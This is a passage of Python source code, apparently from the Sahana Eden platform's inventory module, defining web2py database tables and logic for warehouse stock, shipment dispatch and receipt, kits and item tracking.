# if duplicate:
# item.id = duplicate.id
# item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def inv_warehouse_onaccept(form):
"""
Update Affiliation, record ownership and component ownership
"""
current.s3db.org_update_affiliations("inv_warehouse", form.vars)
# ---------------------------------------------------------------------
@staticmethod
def inv_warehouse_duplicate(item):
"""
Import item deduplication, match by name
(Adding location_id doesn't seem to be a good idea)
@param item: the S3ImportItem instance
"""
if item.tablename == "inv_warehouse":
table = item.table
name = "name" in item.data and item.data.name
query = (table.name.lower() == name.lower())
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3InventoryModel(S3Model):
"""
Inventory Management
A module to record inventories of items at a location (site)
"""
names = ("inv_inv_item",
"inv_remove",
"inv_item_id",
"inv_item_represent",
"inv_prep",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
organisation_id = self.org_organisation_id
messages = current.messages
NONE = messages["NONE"]
UNKNOWN_OPT = messages.UNKNOWN_OPT
settings = current.deployment_settings
WAREHOUSE = settings.get_inv_facility_label()
track_pack_values = settings.get_inv_track_pack_values()
inv_source_type = {0: None,
1: T("Donated"),
2: T("Procured"),
}
# =====================================================================
# Inventory Item
#
# Stock in a warehouse or other site's inventory store.
#
# ondelete references have been set to RESTRICT because the inv. items
# should never be automatically deleted
inv_item_status_opts = self.inv_item_status_opts
tablename = "inv_inv_item"
self.define_table(tablename,
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
self.super_link("site_id", "org_site",
default = auth.user.site_id if auth.is_logged_in() else None,
empty = False,
label = WAREHOUSE,
ondelete = "RESTRICT",
represent = self.org_site_represent,
readable = True,
writable = True,
# Comment these to use a Dropdown & not an Autocomplete
#widget = S3SiteAutocompleteWidget(),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (WAREHOUSE,
# messages.AUTOCOMPLETE_HELP)),
),
self.supply_item_entity_id,
self.supply_item_id(ondelete = "RESTRICT",
required = True,
),
self.supply_item_pack_id(ondelete = "RESTRICT",
required = True,
),
Field("quantity", "double", notnull=True,
default = 0.0,
label = T("Quantity"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
requires = IS_FLOAT_IN_RANGE(0, None),
writable = False,
),
Field("bin", "string", length=16,
label = T("Bin"),
represent = lambda v: v or NONE,
),
# @ToDo: Allow items to be marked as 'still on the shelf but allocated to an outgoing shipment'
Field("status", "integer",
default = 0,
label = T("Status"),
represent = lambda opt: \
inv_item_status_opts.get(opt, UNKNOWN_OPT),
requires = IS_EMPTY_OR(
IS_IN_SET(inv_item_status_opts)
),
),
s3_date("purchase_date",
label = T("Purchase Date"),
),
s3_date("expiry_date",
label = T("Expiry Date"),
),
Field("pack_value", "double",
label = T("Value per Pack"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
readable = track_pack_values,
writable = track_pack_values,
),
# @ToDo: Move this into a Currency Widget for the pack_value field
s3_currency(readable = track_pack_values,
writable = track_pack_values,
),
Field("item_source_no", "string", length=16,
label = self.inv_itn_label,
represent = lambda v: v or NONE,
),
# Organisation that owns this item
organisation_id("owner_org_id",
label = T("Owned By (Organization/Branch)"),
ondelete = "SET NULL",
),
# Original donating Organisation
organisation_id("supply_org_id",
label = T("Supplier/Donor"),
ondelete = "SET NULL",
),
Field("source_type", "integer",
default = 0,
label = T("Type"),
represent = lambda opt: \
inv_source_type.get(opt, UNKNOWN_OPT),
requires = IS_EMPTY_OR(
IS_IN_SET(inv_source_type)
),
writable = False,
),
Field.Method("total_value",
self.inv_item_total_value),
Field.Method("pack_quantity",
self.supply_item_pack_quantity(tablename=tablename)),
s3_comments(),
*s3_meta_fields())
# CRUD strings
INV_ITEM = T("Warehouse Stock")
ADD_INV_ITEM = T("Add Stock to Warehouse")
current.response.s3.crud_strings[tablename] = Storage(
label_create = ADD_INV_ITEM,
title_display = T("Warehouse Stock Details"),
title_list = T("Stock in Warehouse"),
title_update = T("Edit Warehouse Stock"),
title_report = T("Warehouse Stock Report"),
title_upload = T("Import Warehouse Stock"),
label_list_button = T("List Stock in Warehouse"),
label_delete_button = T("Remove Stock from Warehouse"),
msg_record_created = T("Stock added to Warehouse"),
msg_record_modified = T("Warehouse Stock updated"),
msg_record_deleted = T("Stock removed from Warehouse"),
msg_list_empty = T("No Stock currently registered in this Warehouse"))
# Reusable Field
inv_item_represent = inv_InvItemRepresent()
inv_item_id = S3ReusableField("inv_item_id", "reference %s" % tablename,
label = INV_ITEM,
ondelete = "CASCADE",
represent = inv_item_represent,
requires = IS_ONE_OF(db, "inv_inv_item.id",
inv_item_represent,
orderby="inv_inv_item.id",
sort=True),
comment = DIV(_class="tooltip",
_title="%s|%s" % (INV_ITEM,
T("Select Stock from this Warehouse"))),
script = '''
$.filterOptionsS3({
'trigger':'inv_item_id',
'target':'item_pack_id',
'lookupResource':'item_pack',
'lookupPrefix':'supply',
'lookupURL':S3.Ap.concat('/inv/inv_item_packs/'),
'msgNoRecords':i18n.no_packs,
'fncPrep':S3.supply.fncPrepItem,
'fncRepresent':S3.supply.fncRepresentItem
})''')
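        # The jQuery snippet embedded above narrows the item_pack_id dropdown
        # to the packs of the currently selected stock item: whenever
        # inv_item_id changes, filterOptionsS3 looks the packs up via
        # /inv/inv_item_packs/.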
# Filter widgets
filter_widgets = [
S3TextFilter(["item_id$name",
"item_pack_id$name",
],
label=T("Item name"),
comment=T("Search for items with this text in the name."),
),
S3OptionsFilter("site_id",
label=T("Facility"),
cols = 2,
hidden = True,
),
S3OptionsFilter("status",
label=T("Status"),
cols = 2,
hidden = True,
),
S3RangeFilter("quantity",
label=T("Quantity range"),
comment=T("Include only items where quantity is in this range."),
ge=10,
hidden = True,
),
S3DateFilter("purchase_date",
label=T("Purchase date"),
comment=T("Include only items purchased within the specified dates."),
hidden = True,
),
S3DateFilter("other_date",
label=T("Expiry date"),
comment=T("Include only items that expire within the specified dates."),
hidden = True,
),
S3OptionsFilter("owner_org_id",
label=T("Owning organization"),
comment=T("Search for items by owning organization."),
represent="%(name)s",
cols=2,
hidden = True,
),
S3OptionsFilter("supply_org_id",
label=T("Donating Organization"),
comment=T("Search for items by donating organization."),
represent="%(name)s",
cols=2,
hidden = True,
),
]
# Report options
if track_pack_values:
rows = ["item_id", "item_id$item_category_id", "currency"]
cols = ["site_id", "owner_org_id", "supply_org_id", "currency"]
fact = ["quantity", (T("Total Value"), "total_value"),]
else:
rows = ["item_id", "item_id$item_category_id"]
cols = ["site_id", "owner_org_id", "supply_org_id"]
fact = ["quantity"]
report_options = Storage(rows = rows,
cols = cols,
fact = fact,
methods = ["sum"],
defaults = Storage(rows = "item_id",
cols = "site_id",
fact = "sum(quantity)",
),
groupby = self.inv_inv_item.site_id,
hide_comments = True,
)
# List fields
if track_pack_values:
list_fields = ["id",
"site_id",
"item_id",
"item_id$code",
"item_id$item_category_id",
"quantity",
"owner_org_id",
"pack_value",
(T("Total Value"), "total_value"),
"currency",
"bin",
"supply_org_id",
"status",
]
else:
list_fields = ["id",
"site_id",
"item_id",
"item_id$code",
"item_id$item_category_id",
"quantity",
"bin",
"owner_org_id",
"supply_org_id",
"status",
]
# Configuration
direct_stock_edits = settings.get_inv_direct_stock_edits()
self.configure(tablename,
# Lock the record so that it can't be meddled with
# - unless explicitly told to allow this
create = direct_stock_edits,
deletable = direct_stock_edits,
editable = direct_stock_edits,
listadd = direct_stock_edits,
deduplicate = self.inv_item_duplicate,
extra_fields = ["quantity",
"pack_value",
"item_pack_id",
],
filter_widgets = filter_widgets,
list_fields = list_fields,
onvalidation = self.inv_inv_item_onvalidate,
report_options = report_options,
super_entity = "supply_item_entity",
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(inv_item_id = inv_item_id,
inv_item_represent = inv_item_represent,
inv_remove = self.inv_remove,
inv_prep = self.inv_prep,
)
# -------------------------------------------------------------------------
@staticmethod
def inv_item_total_value(row):
""" Total value of an inventory item """
if hasattr(row, "inv_inv_item"):
row = row.inv_inv_item
try:
v = row.quantity * row.pack_value
return v
        except (AttributeError, TypeError):
# not available
return current.messages["NONE"]
# -------------------------------------------------------------------------
@staticmethod
def inv_inv_item_onvalidate(form):
"""
            When an inv_inv_item record is created with a source number,
            the source number needs to be unique within the organisation.
"""
item_source_no = form.vars.item_source_no
if not item_source_no:
return
if hasattr(form, "record"):
record = form.record
if record and \
record.item_source_no and \
record.item_source_no == item_source_no:
# The tracking number hasn't changed so no validation needed
return
db = current.db
s3db = current.s3db
itable = s3db.inv_inv_item
# Was: "track_org_id" - but inv_inv_item has no "track_org_id"!
org_field = "owner_org_id"
query = (itable[org_field] == form.vars[org_field]) & \
(itable.item_source_no == item_source_no)
record = db(query).select(itable[org_field],
limitby=(0, 1)).first()
if record:
org = current.response.s3 \
.org_organisation_represent(record[org_field])
form.errors.item_source_no = current.T("The Tracking Number %s "
"is already used by %s.") % \
(item_source_no, org)
# -------------------------------------------------------------------------
@staticmethod
def inv_remove(inv_rec,
required_total,
required_pack_value = 1,
current_track_total = 0,
update = True,
):
"""
            Check that the required_total can be removed from the inv_record;
            if there is insufficient stock then reduce the total to what is
            in stock, otherwise use the required total.
            If the update flag is True then remove the quantity from stock.
            current_track_total is what has already been removed for this
            transaction.
"""
db = current.db
inv_item_table = db.inv_inv_item
siptable = db.supply_item_pack
inv_p_qnty = db(siptable.id == inv_rec.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
inv_qnty = inv_rec.quantity * inv_p_qnty
cur_qnty = current_track_total * inv_p_qnty
req_qnty = required_total * required_pack_value
# It already matches so no change required
if cur_qnty == req_qnty:
return required_total
if inv_qnty + cur_qnty > req_qnty:
send_item_quantity = req_qnty
new_qnty = (inv_qnty + cur_qnty - req_qnty) / inv_p_qnty
else:
send_item_quantity = inv_qnty + cur_qnty
new_qnty = 0
send_item_quantity = send_item_quantity / inv_p_qnty
if update:
# Update the levels in stock
if new_qnty:
db(inv_item_table.id == inv_rec.id).update(quantity = new_qnty)
else:
db(inv_item_table.id == inv_rec.id).update(deleted = True)
return send_item_quantity
# -------------------------------------------------------------------------
@staticmethod
def inv_prep(r):
"""
            Used in site REST controllers to filter out items which are
            already in this inventory
"""
if r.component:
if r.component.name == "inv_item":
db = current.db
table = db.inv_inv_item
# Filter out items which are already in this inventory
query = (table.site_id == r.record.site_id) & \
(table.deleted == False)
inv_item_rows = db(query).select(table.item_id)
item_ids = [row.item_id for row in inv_item_rows]
# Ensure that the current item CAN be selected
if r.method == "update":
item = db(table.id == r.args[2]).select(table.item_id,
limitby=(0, 1)).first()
item_ids.remove(item.item_id)
table.item_id.requires.set_filter(not_filterby = "id",
not_filter_opts = item_ids)
elif r.component.name == "send":
                # Default to the Search tab in the location selector widget
current.response.s3.gis.tab = "search"
#if current.request.get_vars.get("select", "sent") == "incoming":
# # Display only incoming shipments which haven't been received yet
# filter = (current.s3db.inv_send.status == SHIP_STATUS_SENT)
# r.resource.add_component_filter("send", filter)
# -------------------------------------------------------------------------
@staticmethod
def inv_item_duplicate(job):
"""
Rules for finding a duplicate:
- Look for a record with the same site,
bin,
supply item and,
pack item
            If an item is added as part of an inv_track_item import then the
            quantity will be set to zero. This would overwrite any existing
            total if we have a duplicate, and a None total would fail
            validation (it is a not-null field). So if a duplicate is found,
            the incoming zero quantity is replaced with the existing stock
            total.
"""
if job.tablename == "inv_inv_item":
table = job.table
data = job.data
site_id = "site_id" in data and data.site_id
item_id = "item_id" in data and data.item_id
pack_id = "item_pack_id" in data and data.item_pack_id
owner_org_id = "owner_org_id" in data and data.owner_org_id
supply_org_id = "supply_org_id" in data and data.supply_org_id
pack_value = "pack_value" in data and data.pack_value
currency = "currency" in data and data.currency
bin = "bin" in data and data.bin
query = (table.site_id == site_id) & \
(table.item_id == item_id) & \
(table.item_pack_id == pack_id) & \
(table.owner_org_id == owner_org_id) & \
(table.supply_org_id == supply_org_id) & \
(table.pack_value == pack_value) & \
(table.currency == currency) & \
(table.bin == bin)
id = duplicator(job, query)
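            # If a duplicate exists and the import supplies quantity = 0 (as
            # inv_track_item imports do), keep the existing stock total rather
            # than overwriting it with zero.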
if id:
if "quantity" in data and data.quantity == 0:
job.data.quantity = table[id].quantity
# =============================================================================
class S3InventoryTrackingLabels(S3Model):
""" Tracking Status Labels """
names = ("inv_tracking_status_labels",
"inv_shipment_status_labels",
"inv_itn_label",
"inv_item_status_opts",
)
def model(self):
T = current.T
shipment_status = {SHIP_STATUS_IN_PROCESS: T("In Process"),
SHIP_STATUS_RECEIVED: T("Received"),
SHIP_STATUS_SENT: T("Sent"),
SHIP_STATUS_CANCEL: T("Canceled"),
SHIP_STATUS_RETURNING: T("Returning"),
}
tracking_status = {TRACK_STATUS_UNKNOWN: T("Unknown"),
TRACK_STATUS_PREPARING: T("In Process"),
TRACK_STATUS_TRANSIT: T("In transit"),
TRACK_STATUS_UNLOADING: T("Unloading"),
TRACK_STATUS_ARRIVED: T("Arrived"),
TRACK_STATUS_CANCELED: T("Canceled"),
TRACK_STATUS_RETURNING: T("Returning"),
}
#itn_label = T("Item Source Tracking Number")
# Overwrite the label until we have a better way to do this
itn_label = T("CTN")
settings = current.deployment_settings
return dict(inv_tracking_status_labels = tracking_status,
inv_shipment_status_labels = shipment_status,
inv_itn_label = itn_label,
inv_item_status_opts = settings.get_inv_item_status()
)
# -------------------------------------------------------------------------
def defaults(self):
        # Even if the inv module is disabled, the label dicts can remain the same
return self.model()
# =============================================================================
class S3InventoryTrackingModel(S3Model):
"""
A module to manage the shipment of inventory items
- Sent Items
- Received Items
- And audit trail of the shipment process
"""
names = ("inv_send",
"inv_send_represent",
"inv_send_ref_represent",
"inv_send_controller",
"inv_send_onaccept",
"inv_send_process",
"inv_recv",
"inv_recv_represent",
"inv_recv_ref_represent",
"inv_kit",
"inv_track_item",
"inv_track_item_onaccept",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
settings = current.deployment_settings
person_id = self.pr_person_id
organisation_id = self.org_organisation_id
item_id = self.supply_item_id
inv_item_id = self.inv_item_id
item_pack_id = self.supply_item_pack_id
req_item_id = self.req_item_id
req_ref = self.req_req_ref
tracking_status = self.inv_tracking_status_labels
shipment_status = self.inv_shipment_status_labels
org_site_represent = self.org_site_represent
messages = current.messages
NONE = messages["NONE"]
UNKNOWN_OPT = messages.UNKNOWN_OPT
SITE_LABEL = settings.get_org_site_label()
show_org = settings.get_inv_send_show_org()
show_transport = settings.get_inv_send_show_mode_of_transport()
show_req_ref = settings.get_req_use_req_number()
type_default = settings.get_inv_send_type_default()
time_in = settings.get_inv_send_show_time_in()
add_components = self.add_components
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
set_method = self.set_method
super_link = self.super_link
is_logged_in = auth.is_logged_in
user = auth.user
s3_string_represent = lambda str: str if str else NONE
send_ref = S3ReusableField("send_ref",
label = T(settings.get_inv_send_ref_field_name()),
represent = self.inv_send_ref_represent,
writable = False,
)
recv_ref = S3ReusableField("recv_ref",
label = T("%(GRN)s Number") % dict(GRN=settings.get_inv_recv_shortname()),
represent = self.inv_recv_ref_represent,
writable = False,
)
purchase_ref = S3ReusableField("purchase_ref",
label = T("%(PO)s Number") % dict(PO=settings.get_proc_shortname()),
represent = s3_string_represent,
)
# ---------------------------------------------------------------------
# Send (Outgoing / Dispatch / etc)
#
send_type_opts = settings.get_inv_shipment_types()
send_type_opts.update(self.inv_item_status_opts)
send_type_opts.update(settings.get_inv_send_types())
tablename = "inv_send"
define_table(tablename,
send_ref(),
req_ref(readable = show_req_ref,
writable = show_req_ref,
),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("site_id", "org_site",
default = user.site_id if is_logged_in() else None,
empty = False,
instance_types = auth.org_site_types,
label = T("From %(site)s") % dict(site=SITE_LABEL),
not_filterby = "obsolete",
not_filter_opts = (True,),
readable = True,
writable = True,
represent = org_site_represent,
updateable = True,
#widget = S3SiteAutocompleteWidget(),
),
Field("type", "integer",
default = type_default,
label = T("Shipment Type"),
represent = lambda opt: \
send_type_opts.get(opt, UNKNOWN_OPT),
requires = IS_IN_SET(send_type_opts),
readable = not type_default,
writable = not type_default,
),
# This is a reference, not a super-link, so we can override
Field("to_site_id", self.org_site,
label = T("To %(site)s") % dict(site=SITE_LABEL),
ondelete = "SET NULL",
represent = org_site_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "org_site.site_id",
lambda id, row: \
org_site_represent(id, row,
show_link=False),
sort=True,
not_filterby = "obsolete",
not_filter_opts = (True,),
)),
),
organisation_id(
label = T("To Organization"),
readable = show_org,
writable = show_org,
),
person_id("sender_id",
default = auth.s3_logged_in_person(),
label = T("Sent By"),
ondelete = "SET NULL",
comment = self.pr_person_comment(child="sender_id"),
),
person_id("recipient_id",
label = T("To Person"),
ondelete = "SET NULL",
represent = self.pr_person_phone_represent,
comment = self.pr_person_comment(child="recipient_id"),
),
Field("transport_type",
label = T("Type of Transport"),
readable = show_transport,
writable = show_transport,
represent = s3_string_represent,
),
Field("transported_by",
label = T("Transported by"),
readable = show_transport,
writable = show_transport,
represent = s3_string_represent,
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Transported by"),
T("Freight company or organisation providing transport"))),
),
Field("transport_ref",
label = T("Transport Reference"),
readable = show_transport,
writable = show_transport,
represent = s3_string_represent,
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Transport Reference"),
T("Consignment Number, Tracking Number, etc"))),
),
Field("driver_name",
label = T("Name of Driver"),
represent = s3_string_represent,
),
Field("driver_phone",
label = T("Driver Phone Number"),
represent = lambda v: v or "",
requires = IS_EMPTY_OR(s3_phone_requires),
),
Field("vehicle_plate_no",
label = T("Vehicle Plate Number"),
represent = s3_string_represent,
),
Field("time_in", "time",
label = T("Time In"),
represent = s3_string_represent,
readable = time_in,
writable = time_in,
),
Field("time_out", "time",
label = T("Time Out"),
represent = s3_string_represent,
),
s3_datetime(label = T("Date Sent"),
# Not always sent straight away
#default = "now",
represent = "date",
writable = False,
),
s3_datetime("delivery_date",
label = T("Estimated Delivery Date"),
represent = "date",
writable = False,
),
Field("status", "integer",
default = SHIP_STATUS_IN_PROCESS,
label = T("Status"),
represent = lambda opt: \
shipment_status.get(opt, UNKNOWN_OPT),
requires = IS_EMPTY_OR(
IS_IN_SET(shipment_status)
),
writable = False,
),
s3_comments(),
*s3_meta_fields())
# Filter Widgets
filter_widgets = [
S3TextFilter(["sender_id$first_name",
"sender_id$middle_name",
"sender_id$last_name",
"comments",
"site_id$name",
"send_ref",
"recipient_id$first_name",
"recipient_id$middle_name",
"recipient_id$last_name",
],
label = T("Search"),
comment = T("Search for an item by text."),
),
S3OptionsFilter("to_site_id",
label = T("To Organization"),
comment = T("If none are selected, then all are searched."),
cols = 2,
hidden = True,
),
S3TextFilter("type",
label = T("Shipment Type"),
hidden = True,
),
S3TextFilter("transport_type",
label = T("Type of Transport"),
hidden = True,
),
S3DateFilter("date",
label = T("Date Sent"),
comment = T("Search for a shipment sent between these dates."),
hidden = True,
),
S3DateFilter("delivery_date",
label = T("Estimated Delivery Date"),
comment = T("Search for a shipment which has an estimated delivery between these dates."),
hidden = True,
),
]
# CRUD strings
ADD_SEND = T("Send New Shipment")
crud_strings[tablename] = Storage(
label_create = ADD_SEND,
title_display = T("Sent Shipment Details"),
title_list = T("Sent Shipments"),
title_update = T("Shipment to Send"),
label_list_button = T("List Sent Shipments"),
label_delete_button = T("Delete Sent Shipment"),
msg_record_created = T("Shipment Created"),
msg_record_modified = T("Sent Shipment updated"),
msg_record_deleted = T("Sent Shipment canceled"),
msg_list_empty = T("No Sent Shipments"))
# Reusable Field
send_id = S3ReusableField("send_id", "reference %s" % tablename,
label = T("Send Shipment"),
ondelete = "RESTRICT",
represent = self.inv_send_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_send.id",
self.inv_send_represent,
orderby="inv_send_id.date",
sort=True)),
sortby = "date",
)
# Components
add_components(tablename,
inv_track_item = "send_id",
)
# Custom methods
# Generate Consignment Note
set_method("inv", "send",
method="form",
action=self.inv_send_form)
set_method("inv", "send",
method= "timeline",
action = self.inv_timeline)
# Redirect to the Items tabs after creation
if current.request.controller == "req":
c = "req"
else:
c = "inv"
send_item_url = URL(c=c, f="send", args=["[id]",
"track_item"])
list_fields = ["id",
"send_ref",
"req_ref",
"sender_id",
"site_id",
"date",
"recipient_id",
"delivery_date",
"to_site_id",
"status",
"driver_name",
"driver_phone",
"vehicle_plate_no",
"time_out",
"comments"
]
if time_in:
list_fields.insert(12, "time_in")
if show_transport:
list_fields.insert(10, "transport_type")
configure(tablename,
# It shouldn't be possible for the user to delete a send item
# unless *maybe* if it is pending and has no items referencing it
deletable = False,
filter_widgets = filter_widgets,
onaccept = self.inv_send_onaccept,
onvalidation = self.inv_send_onvalidation,
create_next = send_item_url,
update_next = send_item_url,
list_fields = list_fields,
orderby = "inv_send.date desc",
sortby = [[5, "desc"], [1, "asc"]],
)
# ---------------------------------------------------------------------
# Received (In/Receive / Donation / etc)
#
ship_doc_status = { SHIP_DOC_PENDING : T("Pending"),
SHIP_DOC_COMPLETE : T("Complete") }
recv_type_opts = settings.get_inv_shipment_types()
recv_type_opts.update(settings.get_inv_recv_types())
radio_widget = lambda field, value: \
RadioWidget().widget(field, value, cols = 2)
tablename = "inv_recv"
define_table(tablename,
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("site_id", "org_site",
label = T("%(site)s (Recipient)") % dict(site=SITE_LABEL),
ondelete = "SET NULL",
instance_types = auth.org_site_types,
updateable = True,
not_filterby = "obsolete",
not_filter_opts = (True,),
default = user.site_id if is_logged_in() else None,
readable = True,
writable = True,
empty = False,
represent = org_site_represent,
#widget = S3SiteAutocompleteWidget(),
),
Field("type", "integer",
requires = IS_IN_SET(recv_type_opts),
represent = lambda opt: \
recv_type_opts.get(opt, UNKNOWN_OPT),
label = T("Shipment Type"),
default = 0,
),
organisation_id(label = T("Organization/Supplier")
),
# This is a reference, not a super-link, so we can override
Field("from_site_id", "reference org_site",
label = T("From %(site)s") % dict(site=SITE_LABEL),
ondelete = "SET NULL",
#widget = S3SiteAutocompleteWidget(),
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "org_site.site_id",
lambda id, row: \
org_site_represent(id, row,
show_link = False),
sort=True,
not_filterby = "obsolete",
not_filter_opts = (True,),
)),
represent = org_site_represent
),
s3_date("eta",
label = T("Date Expected"),
writable = False),
s3_datetime(label = T("Date Received"),
represent = "date",
# Can also be set manually (when catching up with backlog of paperwork)
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Date Received"),
# T("Will be filled automatically when the Shipment has been Received"))),
),
send_ref(),
recv_ref(),
purchase_ref(),
req_ref(readable=show_req_ref,
writable=show_req_ref
),
person_id(name = "sender_id",
label = T("Sent By Person"),
ondelete = "SET NULL",
comment = self.pr_person_comment(child="sender_id"),
),
person_id(name = "recipient_id",
label = T("Received By"),
ondelete = "SET NULL",
default = auth.s3_logged_in_person(),
comment = self.pr_person_comment(child="recipient_id")),
Field("status", "integer",
requires = IS_EMPTY_OR(
IS_IN_SET(shipment_status)
),
represent = lambda opt: \
shipment_status.get(opt, UNKNOWN_OPT),
default = SHIP_STATUS_IN_PROCESS,
label = T("Status"),
writable = False,
),
Field("grn_status", "integer",
requires = IS_EMPTY_OR(
IS_IN_SET(ship_doc_status)
),
represent = lambda opt: \
ship_doc_status.get(opt, UNKNOWN_OPT),
default = SHIP_DOC_PENDING,
widget = radio_widget,
label = T("%(GRN)s Status") % \
dict(GRN=settings.get_inv_recv_shortname()),
comment = DIV(_class="tooltip",
_title="%s|%s" % \
(T("%(GRN)s Status") % dict(GRN=settings.get_inv_recv_shortname()),
T("Has the %(GRN)s (%(GRN_name)s) form been completed?") % \
dict(GRN=settings.get_inv_recv_shortname(),
GRN_name=settings.get_inv_recv_form_name()))),
),
Field("cert_status", "integer",
requires = IS_EMPTY_OR(
IS_IN_SET(ship_doc_status)
),
represent = lambda opt: \
ship_doc_status.get(opt, UNKNOWN_OPT),
default = SHIP_DOC_PENDING,
widget = radio_widget,
label = T("Certificate Status"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Certificate Status"),
T("Has the Certificate for receipt of the shipment been given to the sender?"))),
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
inv_recv_crud_strings()
if settings.get_inv_shipment_name() == "order":
recv_id_label = T("Order")
else:
recv_id_label = T("Receive Shipment")
# Reusable Field
recv_id = S3ReusableField("recv_id", "reference %s" % tablename,
label = recv_id_label,
ondelete = "RESTRICT",
represent = self.inv_recv_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_recv.id",
self.inv_recv_represent,
orderby="inv_recv.date",
sort=True)),
sortby = "date",
)
# Search Method
if settings.get_inv_shipment_name() == "order":
recv_search_comment = T("Search for an order by looking for text in any field.")
recv_search_date_field = "eta"
recv_search_date_comment = T("Search for an order expected between these dates")
else:
recv_search_comment = T("Search for a shipment by looking for text in any field.")
recv_search_date_field = "date"
recv_search_date_comment = T("Search for a shipment received between these dates")
# @todo: make lazy_table
table = db[tablename]
filter_widgets = [
S3TextFilter(["sender_id$first_name",
"sender_id$middle_name",
"sender_id$last_name",
"comments",
"from_site_id$name",
"recipient_id$first_name",
"recipient_id$middle_name",
"recipient_id$last_name",
"site_id$name",
"recv_ref",
"send_ref",
"purchase_ref",
],
label = T("Search"),
comment = recv_search_comment,
),
S3DateFilter(recv_search_date_field,
label = table[recv_search_date_field].label,
comment = recv_search_date_comment,
hidden = True,
),
S3OptionsFilter("site_id",
label = SITE_LABEL,
cols = 2,
hidden = True,
),
S3OptionsFilter("status",
label = T("Status"),
cols = 2,
hidden = True,
),
#S3OptionsFilter("grn_status",
#label = T("GRN Status"),
#cols = 2,
#hidden = True,
#),
#S3OptionsFilter("cert_status",
#label = T("Certificate Status"),
#cols = 2,
#hidden = True,
#),
]
# Redirect to the Items tabs after creation
recv_item_url = URL(c="inv", f="recv", args=["[id]",
"track_item"])
configure(tablename,
                  # It shouldn't be possible for the user to delete a received shipment
deletable=False,
list_fields = ["id",
"recv_ref",
"send_ref",
"purchase_ref",
"recipient_id",
"organisation_id",
"from_site_id",
"site_id",
"date",
"type",
"status",
"req_ref",
"sender_id",
"comments"
],
mark_required = ("from_site_id", "organisation_id"),
onvalidation = self.inv_recv_onvalidation,
onaccept = self.inv_recv_onaccept,
filter_widgets = filter_widgets,
create_next = recv_item_url,
update_next = recv_item_url,
orderby="inv_recv.date desc",
sortby=[[6, "desc"], [1, "asc"]])
# Components
add_components(tablename,
inv_track_item = "recv_id",
)
# Custom methods
# Print Forms
set_method("inv", "recv",
method = "form",
action = self.inv_recv_form)
set_method("inv", "recv",
method = "cert",
action = self.inv_recv_donation_cert )
set_method("inv", "recv",
method = "timeline",
action = self.inv_timeline)
# ---------------------------------------------------------------------
# Kits
# - actual Kits in stock
#
tablename = "inv_kit"
define_table(tablename,
Field("site_id", "reference org_site",
label = T("By %(site)s") % dict(site=SITE_LABEL),
requires = IS_ONE_OF(db, "org_site.site_id",
lambda id, row: \
org_site_represent(id, row,
show_link=False),
instance_types = auth.org_site_types,
updateable = True,
sort=True,
),
default = user.site_id if is_logged_in() else None,
readable = True,
writable = True,
widget = S3SiteAutocompleteWidget(),
represent = org_site_represent,
comment = S3AddResourceLink(
c="inv",
f="warehouse",
label=T("Create Warehouse"),
title=T("Warehouse"),
tooltip=T("Type the name of an existing site OR Click 'Create Warehouse' to add a new warehouse.")),
),
item_id(label = T("Kit"),
requires = IS_ONE_OF(db, "supply_item.id",
self.supply_item_represent,
filterby="kit",
filter_opts=(True,),
sort=True),
widget = S3AutocompleteWidget("supply", "item",
filter="item.kit=1"),
# Needs better workflow as no way to add the Kit Items
#comment = S3AddResourceLink(
# c="supply",
# f="item",
# label=T("Create Kit"),
# title=T("Kit"),
# tooltip=T("Type the name of an existing catalog kit OR Click 'Create Kit' to add a kit which is not in the catalog.")),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Kit"),
T("Type the name of an existing catalog kit"))),
),
Field("quantity", "double",
label = T("Quantity"),
represent = lambda v, row=None: \
IS_FLOAT_AMOUNT.represent(v, precision=2)
),
s3_date(comment = DIV(_class="tooltip",
_title="%s|%s" % \
(T("Date Repacked"),
T("Will be filled automatically when the Item has been Repacked")))
),
req_ref(writable = True),
person_id(name = "repacked_id",
label = T("Repacked By"),
ondelete = "SET NULL",
default = auth.s3_logged_in_person(),
#comment = self.pr_person_comment(child="repacked_id")),
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_KIT = T("Create Kit")
crud_strings[tablename] = Storage(
label_create = ADD_KIT,
title_display = T("Kit Details"),
title_list = T("Kits"),
title_update = T("Kit"),
label_list_button = T("List Kits"),
label_delete_button = T("Delete Kit"),
msg_record_created = T("Kit Created"),
msg_record_modified = T("Kit updated"),
msg_record_deleted = T("Kit canceled"),
msg_list_empty = T("No Kits"))
# Resource configuration
configure(tablename,
list_fields = ["site_id",
"req_ref",
"quantity",
"date",
"repacked_id"],
onvalidation = self.inv_kit_onvalidate,
onaccept = self.inv_kit_onaccept,
)
# ---------------------------------------------------------------------
# Tracking Items
#
inv_item_status_opts = self.inv_item_status_opts
tablename = "inv_track_item"
define_table(tablename,
organisation_id(name = "track_org_id",
label = T("Shipping Organization"),
ondelete = "SET NULL",
readable = False,
writable = False
),
inv_item_id(name="send_inv_item_id",
ondelete = "RESTRICT",
# Local Purchases don't have this available
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_inv_item.id",
self.inv_item_represent,
